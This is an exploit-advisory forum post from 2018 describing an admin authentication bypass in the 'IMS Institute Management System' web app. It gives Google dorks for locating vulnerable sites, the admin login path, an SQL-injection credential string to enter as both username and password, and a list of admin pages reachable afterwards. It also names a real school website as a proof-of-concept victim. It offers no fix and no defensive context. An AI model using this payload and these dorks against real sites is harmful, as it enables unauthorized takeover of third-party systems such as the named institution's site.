Topic: Ims Institute Management JsitPark Admin Bypass Vuln
KingSkrupellos
Comment: #1
21.06.2018 22:09
#################################################################################################

# Exploit Title : © IMS Institute Management System by JS IT Park 2017-18 Version 1.0.1 Admin Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : codecanyon.net/item/ims-institute-management-system/19414428
+ codecanyon.net/item/ims-pro-institute-management-system/20773196
# Tested On : Windows
# Version : 1.0.1
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# Google Dorks :

intext:''© IMS - Institute Management System by JS IT Park 2017-18 | Version 1.0.1''

intext:''Developed by JS IT Park''

# Administration Control Panel Path : /admin/login.php

# Exploit :

Username : '=''or'

Password : '=''or'

# Useable URL Paths in the Control Panel :

/admin/index.php
/ems/
/admin/profile.php
/admin/website_settings.php
/admin/website_logo.php
/admin/create_page.php
/admin/page_list.php
/admin/subpage_list.php
/admin/new_slider.php
/admin/slider_list.php
/admin/add_slider_text.php
/admin/service_section.php
/admin/update_service.php
/admin/gallery_section.php
/admin/gallery_list.php

#################################################################################################

# Example Site : sbccomilla.edu.bd => Proof of Concept => archive.is/Bq57f

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# There is an organ in the human body. If it is healthy, the whole body is healthy;
if it is corrupted, the whole body is corrupted. Take heed! It is the heart.
[ Prophet Muhammad, peace be upon him ] #

